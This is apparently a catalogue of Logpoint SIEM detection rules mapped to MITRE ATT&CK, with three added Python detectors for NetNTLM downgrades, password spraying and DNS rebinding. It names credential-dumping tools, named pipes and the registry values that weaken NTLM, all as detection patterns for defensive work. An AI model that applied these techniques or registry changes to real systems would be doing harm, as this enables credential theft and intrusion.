ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious InstallUtil Execution
Trigger Condition: Use of InstallUtil to proxy the execution of code through a trusted Windows utility is detected. InstallUtil is a command-line utility that installs and uninstalls resources by executing the installer components specified in .NET binaries.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, InstallUtil
ATT&CK ID: T1218, T1218.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Java Running with Remote Debugging
Trigger Condition: A Java process running with remote debugging enabled and accepting connections from hosts other than localhost is detected. Adversaries may abuse this functionality to execute arbitrary code on remote systems.
ATT&CK Category: Execution
ATT&CK Tag: Exploitation for Client Execution
ATT&CK ID: T1203
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_JunOS Attack
Trigger Condition: Logpoint detects an attack pattern.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1498, T1499
Minimum Log Source Requirement: JunOS
Query:
LP_JunOS Authentication Failed
Trigger Condition: Failure of an authentication.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Brute Force
ATT&CK ID: T1078, T1110
Minimum Log Source Requirement: JunOS
Query:
LP_JunOS Policy Violation
Trigger Condition: A policy violation is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation, Credential Access
ATT&CK Tag: Bypass User Access Control, Exploitation for Credential Access, Exploitation for Privilege Escalation
ATT&CK ID: T1548, T1212, T1068
Minimum Log Source Requirement: JunOS
Query:
LP_JunOS Security Log Clear
Trigger Condition: An administrator has cleared one or more audit logs.
ATT&CK Category: Defense Evasion, Impact
ATT&CK Tag: Indicator Removal on Host, Data Destruction, File Deletion
ATT&CK ID: T1070, T1485, T1070.004
Minimum Log Source Requirement: JunOS
Query:
LP_Kaspersky Antivirus - Outbreak Detection
Trigger Condition: This alert rule is triggered whenever a threat is detected.
ATT&CK Category: Impact
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus - Update Fail
Trigger Condition: Automatic updates are disabled, not all the components are updated, or there is a network error.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Extremely Out of Date Event
Trigger Condition: A Kaspersky "extremely out of date" event is detected, indicating that the antivirus databases have not been updated.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Outbreak Detection by Source
Trigger Condition: More than one source is affected by the same virus.
ATT&CK Category: Impact
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Outbreak Detection by Virus
Trigger Condition: More than ten viruses are detected in the system.
ATT&CK Category: Impact
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Threat Affecting Multiple Host
Trigger Condition: The same threat is detected in multiple hosts.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kernel Firewall Connection Denied
Trigger Condition: Ten firewall connections are denied from the same source to the same destination in a minute.
ATT&CK Category: Impact, Command and Control
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service, Proxy
ATT&CK ID: T1498, T1499, T1090
Minimum Log Source Requirement: Kernel
Query:
LP_Koadic Execution Detected
Trigger Condition: Use of command line parameters associated with the Koadic hack tool during process creation events in Windows systems.
ATT&CK Category: Execution
ATT&CK Tag: Windows Command Shell, Visual Basic, JavaScript
ATT&CK ID: T1059.003, T1059.005, T1059.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Local Account Creation on Workstation Detected
Trigger Condition: This alert is triggered whenever a local account creation on a domain workstation that is not a DC is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Create Account
ATT&CK ID: T1136
Minimum Log Source Requirement: Windows
Query:
LP_LockCrypt Ransomware
Trigger Condition: File encryption by the LockCrypt ransomware is detected.
ATT&CK Category: Impact
ATT&CK Tag: Disk Wipe, Disk Content Wipe, Data Encrypted for Impact, Data Destruction
ATT&CK ID: T1561, T1561.001, T1486, T1485
Minimum Log Source Requirement: Integrity Scanner
Query:
LP_Log Files Creation of Dot-Net-to-JS Detected
Trigger Condition: This alert is triggered whenever the creation of log files associated with DotNetToJScript (.NET to JScript) execution is detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malicious Base64 Encoded PowerShell Keywords in Command Lines Detected
Trigger Condition: Base64-encoded strings carrying well-known malicious keywords in hidden PowerShell command lines are detected. Adversaries encode commands to hide their activity and bypass detection.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious Service Installations Detected
Trigger Condition: Installation of a service known to be malicious is detected. Adversaries install such services for lateral movement, credential dumping and other suspicious activity.
ATT&CK Category: Execution
ATT&CK Tag: Service Execution
ATT&CK ID: T1569.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Malware Threat Connection from Malicious Source
Trigger Condition: Inbound connection from malicious sources is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Malware Threat Connection to Malicious URLs
Trigger Condition: A connection to a malicious URL is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Malware Threat Emails Sent to Attacker
Trigger Condition: An email sent to an address on a malware-associated list is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy, Exfiltration Over C2 Channel, Automated Exfiltration, Email Collection
ATT&CK ID: T1090, T1041, T1020, T1114
Minimum Log Source Requirement: Mail Server
Query:
LP_Meltdown and Spectre Vulnerabilities
Trigger Condition: Meltdown and Spectre vulnerabilities are detected in the system.
ATT&CK Category: Discovery
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Vulnerability Management
Query:
LP_Meterpreter or Cobalt Strike Getsystem Service Start Detected
Trigger Condition: This alert is triggered whenever use of the Meterpreter/Cobalt Strike getsystem command to obtain SYSTEM privileges is detected through the specific service it starts.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Token Impersonation/Theft, Create Process with Token
ATT&CK ID: T1134.001, T1134.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 Detected
Trigger Condition: The exploitation of memory corruption vulnerability (CVE-2017-11882) in Microsoft Office is detected.
ATT&CK Category: Execution
ATT&CK Tag: User Execution
ATT&CK ID: T1204
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Mimikatz Command Line Detected
Trigger Condition: This alert is triggered whenever well-known mimikatz command line arguments are detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory, Security Account Manager, LSA Secrets, Cached Domain Credentials, DCSync
ATT&CK ID: T1003, T1003.001, T1003.002, T1003.003, T1003.004, T1003.005, T1003.006
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Mitre Discovery Using Query Registry Detected
Trigger Condition: Use of the Query Registry discovery technique is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Query Registry
ATT&CK ID: T1012
Minimum Log Source Requirement: Windows
Query:
LP_Mitre Discovery Using System Network Configuration Discovery Detected
Trigger Condition: Use of the System Network Configuration Discovery technique is detected.
ATT&CK Category: Discovery
ATT&CK Tag: System Network Configuration Discovery
ATT&CK ID: T1016
Minimum Log Source Requirement: Windows
Query:
LP_Mitre Persistence via Winlogon Helper DLL Detected
Trigger Condition: Modifications in Winlogon registry keys are detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Boot or Logon Autostart Execution, Winlogon Helper DLL
ATT&CK ID: T1547, T1547.004
Minimum Log Source Requirement: Windows
Query:
LP_MMC Spawning Windows Shell Detected
Trigger Condition: Windows command line executable starting from MMC is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Distributed Component Object Model
ATT&CK ID: T1021.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Most Exploitable Vulnerabilities Detected
Trigger Condition: The most exploitable vulnerabilities from 2015 are detected in a network. For this alert to work, MOST_EXPLOITABLE_CVE must be updated with the list of exploitable vulnerabilities.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning, Software Discovery, Security Software Discovery
ATT&CK ID: T1046, T1518, T1518.001
Minimum Log Source Requirement: Vulnerability Management
Query:
LP_Mshta JavaScript Execution Detected
Trigger Condition: The mshta.exe command is detected.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Signed Binary Proxy Execution, Mshta
ATT&CK ID: T1218, T1218.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_MSHTA Spawning Windows Shell Detected
Trigger Condition: Windows command line executable started from MSHTA is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Mshta
ATT&CK ID: T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_MSHTA Suspicious Execution Detected
Trigger Condition: Suspicious mshta.exe execution patterns, sometimes involving file polyglotism, are detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Deobfuscate/Decode Files or Information
ATT&CK ID: T1140
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_MSTSC Shadowing Detected
Trigger Condition: This alert is triggered whenever it detects RDP session hijacking by using MSTSC (Microsoft Terminal Services Client) shadowing.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Service Session Hijacking, RDP Hijacking
ATT&CK ID: T1563, T1563.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Multiple Failed Login Followed by Successful Login Followed by Logoff
Trigger Condition: Multiple failed login attempts followed by a successful login and then a logoff by the same user are detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access, Credential Access
ATT&CK Tag: Valid Accounts, Brute Force
ATT&CK ID: T1078, T1110
Minimum Log Source Requirement: Windows
Query:
LP_Named Pipe added to Null Session Detected
Trigger Condition: A new value set for the NullSessionPipe registry key is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services
ATT&CK ID: T1021
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Narrators Feedback-Hub Persistence Detected
Trigger Condition: An attempt to abuse the Windows 10 Narrator Feedback-Hub for persistence is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Boot or Logon Autostart Execution, Registry Run Keys/Startup Folder
ATT&CK ID: T1547, T1547.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Net exe Execution Detected
Trigger Condition: The execution of Net.exe, which can be suspicious or benign, is detected.
ATT&CK Category: Lateral Movement, Discovery, Defense Evasion
ATT&CK Tag: Obfuscated Files or Information, System Network Connections Discovery, Remote Services, Network Share Discovery
ATT&CK ID: T1027, T1049, T1021, T1135
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_NetNTLM Downgrade Attack Detected
Trigger Condition: Post-exploitation NetNTLM downgrade activity, such as registry changes that weaken the NTLM authentication settings, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools, Modify Registry
ATT&CK ID: T1562, T1562.001, T1112
Minimum Log Source Requirement: Windows
Query:
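Matching only the key path under Control\Lsa fires on every hardening rollout as well; what distinguishes a downgrade is the direction of the change. The example below is added here and is not Logpoint's own query: it parses the DWORD written in Sysmon event 13 and reports an alert only when LmCompatibilityLevel drops below 3 (LM/NTLMv1 allowed), NtlmMinClientSec/NtlmMinServerSec loses the NTLMv2 session-security or 128-bit flags, or RestrictSendingNTLMTraffic is set to 0. The event field names are assumptions about the normalised log.

```python
"""Evaluate Sysmon registry value-set events (event 13) for NetNTLM downgrades.

Added example, not Logpoint's own query. It checks the three LSA values an
attacker lowers to force LM/NTLMv1 or weak NTLM session security, comparing
the new numeric value against the hardened setting rather than only matching
the key path. Events are constructed dicts; Sysmon writes DWORD values in the
Details field as 'DWORD (0x00000000)'.
"""
from __future__ import annotations

import re

DWORD_RE = re.compile(r"DWORD \((0x[0-9a-fA-F]+)\)")

# Minimum NTLM SSP session security flags (NtlmMinClientSec / NtlmMinServerSec).
NTLMSSP_NEGOTIATE_NTLM2 = 0x00080000   # require NTLMv2 session security
NTLMSSP_NEGOTIATE_128 = 0x20000000     # require 128-bit encryption


def parse_dword(details: str) -> int | None:
    m = DWORD_RE.search(details)
    return int(m.group(1), 16) if m else None


def check_value(target: str, value: int) -> str | None:
    """Return a reason string when the new value weakens NTLM, else None."""
    key = target.lower()
    name = target.rsplit("\\", 1)[-1]
    if key.endswith("\\control\\lsa\\lmcompatibilitylevel"):
        if value < 3:
            return f"LmCompatibilityLevel={value}: LM/NTLMv1 responses allowed"
    elif key.endswith(("\\msv1_0\\ntlmminclientsec", "\\msv1_0\\ntlmminserversec")):
        missing = [label for label, flag in (("NTLMv2 session security", NTLMSSP_NEGOTIATE_NTLM2),
                                             ("128-bit encryption", NTLMSSP_NEGOTIATE_128))
                   if not value & flag]
        if missing:
            return f"{name}=0x{value:08X}: no longer requires " + ", ".join(missing)
    elif key.endswith("\\msv1_0\\restrictsendingntlmtraffic"):
        if value == 0:
            return "RestrictSendingNTLMTraffic=0: outgoing NTLM unrestricted"
    return None


def downgrade_alerts(events: list[dict]) -> list[tuple[str, str]]:
    """Return (image, reason) for registry value-set events that weaken NTLM."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 13:
            continue
        value = parse_dword(ev.get("details", ""))
        if value is None:
            continue
        reason = check_value(ev["target_object"], value)
        if reason:
            alerts.append((ev["image"], reason))
    return alerts


# Constructed sample events (not real telemetry).
LSA = r"HKLM\System\CurrentControlSet\Control\Lsa"
SAMPLE_EVENTS = [
    {"event_id": 13, "image": r"C:\Windows\regedit.exe",
     "target_object": LSA + r"\LmCompatibilityLevel", "details": "DWORD (0x00000000)"},
    {"event_id": 13, "image": r"C:\Windows\System32\svchost.exe",
     "target_object": LSA + r"\LmCompatibilityLevel", "details": "DWORD (0x00000005)"},
    {"event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": LSA + r"\MSV1_0\NtlmMinClientSec", "details": "DWORD (0x00000000)"},
    {"event_id": 13, "image": r"C:\Windows\System32\svchost.exe",
     "target_object": LSA + r"\MSV1_0\NtlmMinClientSec", "details": "DWORD (0x20080000)"},
    {"event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": LSA + r"\MSV1_0\RestrictSendingNTLMTraffic", "details": "DWORD (0x00000000)"},
    {"event_id": 13, "image": r"C:\Windows\System32\svchost.exe",
     "target_object": LSA + r"\Audit\SomethingElse", "details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for image, reason in downgrade_alerts(SAMPLE_EVENTS):
        print(f"ALERT {image}: {reason}")
```

The svchost.exe writes in the sample are what Group Policy refresh looks like when it re-applies the hardened values, and they pass the check without an allow-list because the values themselves are not a downgrade.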
LP_Network Share Connection Removed
Trigger Condition: This alert is triggered whenever the removal of a network share connection is detected. A network share is a shared folder or directory that lets multiple users access files or resources over the network. Adversaries may use network shares to reach sensitive data or to distribute malware; once finished, they may remove the share connections they no longer need in order to clean up traces of their operation.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Network Share Connection Removal
ATT&CK ID: T1070.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Network Sniffing Detected
Trigger Condition: This alert is triggered whenever the execution of network sniffing tools is detected.
ATT&CK Category: Credential Access, Discovery
ATT&CK Tag: Network Sniffing
ATT&CK ID: T1040
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_New Firewall Port Opening Detected
Trigger Condition: An opening of a new port in a firewall is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Non-Standard Port
ATT&CK ID: T1571
Minimum Log Source Requirement: Windows
Query:
LP_New RUN Key Pointing to Suspicious Folder Detected
Trigger Condition: A new RUN key entry pointing to an executable in a suspicious folder is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, Registry Run Keys/Startup Folder
ATT&CK ID: T1547, T1547.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_New Service Creation
Trigger Condition: This alert is triggered whenever it detects creation of a new service. Windows Services can allow creation and management of long running processes.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Create or Modify System Process, Windows Service
ATT&CK ID: T1543, T1543.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_NoPowerShell Tool Activity Detected
Trigger Condition: This alert is triggered whenever execution of the NoPowerShell tool is detected.
ATT&CK Category: Execution
ATT&CK Tag: Shared Modules
ATT&CK ID: T1129
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Office365 Multiple Failed Login from Different Host by Single User
Trigger Condition: Multiple failed logins by a single user from more than one distinct host are detected.
ATT&CK Category: Credential Access, Persistence, Defense Evasion, Privilege Escalation, Initial Access
ATT&CK Tag: Brute Force, Valid Accounts
ATT&CK ID: T1110, T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Multiple Failed Login from Same Host
Trigger Condition: More than five failed logins from the same host are detected.
ATT&CK Category: Credential Access, Persistence, Defense Evasion, Privilege Escalation, Initial Access
ATT&CK Tag: Brute Force, Valid Accounts
ATT&CK ID: T1110, T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Multiple Successful Login from Different Country by Single User
Trigger Condition: Multiple successful logins by a single user from more than one country are detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Multiple Successful Login From Different Host by Single User
Trigger Condition: Multiple successful logins by a single user from more than one distinct host are detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Password Resets
Trigger Condition: A user’s password is reset.
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation
ATT&CK ID: T1098
Minimum Log Source Requirement: Office365
Query:
LP_OpenWith Execution of Specified Binary Detected
Trigger Condition: The execution of OpenWith.exe with command line argument “-c” or “/c” is detected.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Password Change on DSRM Account Detected
Trigger Condition: Password change in Directory Service Restore Mode (DSRM) account is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Account Manipulation
ATT&CK ID: T1098
Minimum Log Source Requirement: Windows
Query:
LP_Password Dumper Remote Thread in LSASS
Trigger Condition: This alert is triggered whenever a remote thread created in LSASS by a password dumper is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Password Spraying Attack Detected
Trigger Condition: Multiple failed login attempts on a host by many different users are detected. Adversaries spray a single password, or a short list of commonly used passwords, against many different accounts to obtain valid credentials without locking any one account out.
ATT&CK Category: Credential Access
ATT&CK Tag: Password Spraying
ATT&CK ID: T1110.003
Minimum Log Source Requirement: Windows
Query:
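The distinction this rule has to make is between one account failing many times (a brute force, which account lockout already handles) and many accounts each failing a few times against the same host inside a short window. The example below is added here and is not Logpoint's own query: it counts distinct users per host over a sliding window of constructed Windows 4625 events and fires only on the spray pattern. The window length and threshold are assumptions to tune per environment.

```python
"""Distinguish password spraying from a plain brute force on Windows 4625 events.

Added example, not Logpoint's own query. A spray is many distinct users
failing against one host inside a short window; a brute force is one user
failing many times. Events are constructed dicts; the window and threshold
are assumptions to tune per environment.
"""
from __future__ import annotations

from collections import Counter, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MIN_DISTINCT_USERS = 5


def spray_alerts(events: list[dict]) -> dict[str, set[str]]:
    """Return {host: users} for hosts where at least MIN_DISTINCT_USERS
    distinct accounts failed to log on within any WINDOW-long span."""
    by_host: dict[str, list[dict]] = {}
    for ev in events:
        if ev.get("event_id") == 4625:
            by_host.setdefault(ev["host"], []).append(ev)

    alerts: dict[str, set[str]] = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["time"])
        recent: deque[tuple[datetime, str]] = deque()
        live: Counter = Counter()   # user -> failures currently inside the window
        for ev in evs:
            ts, user = ev["time"], ev["user"].lower()
            recent.append((ts, user))
            live[user] += 1
            # Expire events that fell out of the window ending at ts.
            while recent and ts - recent[0][0] > WINDOW:
                _, old = recent.popleft()
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
            if len(live) >= MIN_DISTINCT_USERS:
                alerts.setdefault(host, set()).update(live)
    return alerts


def _ev(host: str, user: str, minute: int, event_id: int = 4625) -> dict:
    return {"event_id": event_id, "host": host, "user": user,
            "time": datetime(2024, 1, 15, 9, 0) + timedelta(minutes=minute)}


# Constructed sample (not real telemetry).
SAMPLE_EVENTS = (
    [_ev("DC01", f"user{i}", i) for i in range(6)]            # spray: 6 users in 6 minutes
    + [_ev("FS01", "alice", i) for i in range(20)]            # brute force on one account
    + [_ev("WEB01", f"svc{i}", i * 30) for i in range(6)]     # 6 users spread over 2.5 hours
    + [_ev("DC01", "admin", 3, event_id=4624)]                # a success, not counted here
)

if __name__ == "__main__":
    for host, users in spray_alerts(SAMPLE_EVENTS).items():
        print(f"ALERT spray against {host}: {sorted(users)}")
```

A real rule would also key on the logon type and the source workstation, since sprays against a domain controller usually arrive over the network from one source, and would feed the set of targeted users into the "failed then successful" sequence rule above.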
LP_Persistence and Execution at Scale via GPO Scheduled Task
Trigger Condition: An attempt to access the SYSVOL share that targets a ScheduledTasks.xml file with WriteData permission is detected. SYSVOL is a critical directory on Windows domain controllers that stores domain-wide data, including Group Policy objects.
ATT&CK Category: Persistence, Execution, Privilege Escalation
ATT&CK Tag: Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1053, T1053.005
Minimum Log Source Requirement: Windows
Query:
LP_Possible Account Misuse-Privilege Escalation
Trigger Condition: A non-admin user is assigned privileged access. The rule uses Windows event IDs 4648 and 4672.
ATT&CK Category: Privilege Escalation, Persistence, Defense Evasion
ATT&CK Tag: Account Manipulation, Abuse Elevation Control Mechanism, Bypass User Account Control
Minimum Log Source Requirement: Windows
Query:
LP_Possible Applocker Bypass Detected
Trigger Condition: This alert is triggered whenever it detects the execution of potentially suspicious executables capable of bypassing AppLocker whitelisting.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, Mshta, InstallUtil, Regsvcs/Regasm, Trusted Developer Utilities, MSBuild
ATT&CK ID: T1218, T1218.004, T1218.009, T1127, T1218.005, T1127.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_File Download via Bitsadmin Detected
Trigger Condition: Use of bitsadmin to download a file.
ATT&CK Category: Defense Evasion, Persistence
ATT&CK Tag: BITS Jobs
ATT&CK ID: T1197
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Botnet Connection-DNS Server Modified
Trigger Condition: An unauthorized modification of the default DNS server on a Unix or Windows server is detected.
ATT&CK Category: Impact, Command and Control, Defense Evasion
ATT&CK Tag: Network Denial of Service, Proxy, Exploitation for Defense Evasion
ATT&CK ID: T1498, T1090, T1211
Minimum Log Source Requirement: Windows
Query:
LP_Possible CLR DLL Loaded Via Office Applications
Trigger Condition: This alert is triggered whenever it detects CLR DLL being loaded by an Office Product like Winword, PowerPoint, Excel, or Outlook.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Dumping Tools Named Pipes Detected
Trigger Condition: This alert is triggered whenever the execution of well-known credential dumping tools is detected through the named pipes they create, such as lsadump, cachedump and wceservicepipe.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Data Breach-Off Hour Transfer
Trigger Condition: Unauthorized transfer of sensitive data during off-hours is detected.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Possible DDOS Attack
Trigger Condition: A large volume of inbound traffic within a short period is detected.
ATT&CK Category: Initial Access, Impact
ATT&CK Tag: Exploit Public-Facing Application, Network Denial of Service
ATT&CK ID: T1190, T1498
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Possible Detection of SafetyKatz
Trigger Condition: SafetyKatz behavior is detected: a temporary file named debug.bin is created in the temp folder while dumping LSASS memory to extract credentials.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible DNS Rebinding Detected
Trigger Condition: Different DNS answers for one domain, with IPs from both internal and external networks, are detected. A legitimate DNS answer normally carries a TTL greater than 100, and the record stays in the host cache for that TTL.
ATT&CK Category: Command and Control
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Windows Sysmon
Query:
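The signal is a single name whose answers, across successive queries, fall on both sides of the network boundary. The example below is added here and is not Logpoint's own query: it parses the QueryResults field of constructed Sysmon event 22 records (answers separated by semicolons, IPv4 written as ::ffff:a.b.c.d, CNAMEs as "type: 5 name") and reports names that have resolved to at least one internal and one external address. The internal ranges are an assumed list of RFC 1918, loopback and link-local space; extend it with your own address plan.

```python
"""Spot DNS rebinding: one name answering with both external and internal IPs.

Added example, not Logpoint's own query. Events are constructed dicts in the
shape of Sysmon event 22 (DNS query), whose QueryResults field lists answers
separated by ';' with IPv4 addresses written as '::ffff:a.b.c.d' and CNAME
entries as 'type: 5 name'. INTERNAL_NETS is an assumed list.
"""
from __future__ import annotations

import ipaddress

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",      # loopback, link-local, "this host"
    "::1/128", "fc00::/7", "fe80::/10",                # IPv6 equivalents
)]


def parse_answers(query_results: str) -> list[ipaddress.IPv4Address | ipaddress.IPv6Address]:
    """Extract the IP addresses from a Sysmon QueryResults string."""
    addrs = []
    for token in query_results.split(";"):
        token = token.strip()
        if not token or token.startswith("type:"):
            continue                        # CNAME/other records carry no address
        if token.startswith("::ffff:"):
            token = token[len("::ffff:"):]  # IPv4 shown as IPv4-mapped IPv6
        try:
            addrs.append(ipaddress.ip_address(token))
        except ValueError:
            continue
    return addrs


def is_internal(addr: ipaddress.IPv4Address | ipaddress.IPv6Address) -> bool:
    # 'in' is False across address families, so mixing v4 and v6 networks is safe.
    return any(addr in net for net in INTERNAL_NETS)


def rebinding_candidates(events: list[dict]) -> dict[str, tuple[set[str], set[str]]]:
    """Return {domain: (internal_ips, external_ips)} for names whose answers,
    across all observed queries, include at least one of each."""
    seen: dict[str, tuple[set[str], set[str]]] = {}
    for ev in events:
        if ev.get("event_id") != 22:
            continue
        internal, external = seen.setdefault(ev["query_name"].lower(), (set(), set()))
        for addr in parse_answers(ev["query_results"]):
            (internal if is_internal(addr) else external).add(str(addr))
    return {d: v for d, v in seen.items() if v[0] and v[1]}


# Constructed sample events (not real telemetry); public IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"event_id": 22, "query_name": "evil.example", "query_results": "::ffff:203.0.113.10;"},
    {"event_id": 22, "query_name": "evil.example", "query_results": "::ffff:192.168.1.20;"},
    {"event_id": 22, "query_name": "cdn.example",
     "query_results": "type: 5 edge.cdn.example;::ffff:198.51.100.7;::ffff:198.51.100.8;"},
    {"event_id": 22, "query_name": "intranet.example", "query_results": "::ffff:10.20.30.40;"},
    {"event_id": 22, "query_name": "www.evil.example", "query_results": "::ffff:203.0.113.11;::1;"},
]

if __name__ == "__main__":
    for domain, (internal, external) in rebinding_candidates(SAMPLE_EVENTS).items():
        print(f"ALERT {domain} resolved to internal {sorted(internal)} and external {sorted(external)}")
```

Split-horizon DNS produces the same pattern for names your own resolvers answer differently inside and outside, so the domain list needs an allow-list of those zones before it is useful as an alert.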
LP_Possible Empire Monkey Detected
Trigger Condition: This alert is triggered whenever the execution of a specific command-line sequence involving the cutil.exe or regsvr32.exe tools is detected. Empire Monkey is an advanced persistent threat (APT) group involved in cyber espionage.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Regsvr32
ATT&CK ID: T1059.001, T1218.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Impacket SecretDump Remote Activity
Trigger Condition: Active Directory credential dumping over a network share using the Impacket secretsdump hacktool is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_Possible Inbound Spamming Detected
Trigger Condition: Logpoint detects possible inbound spam.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
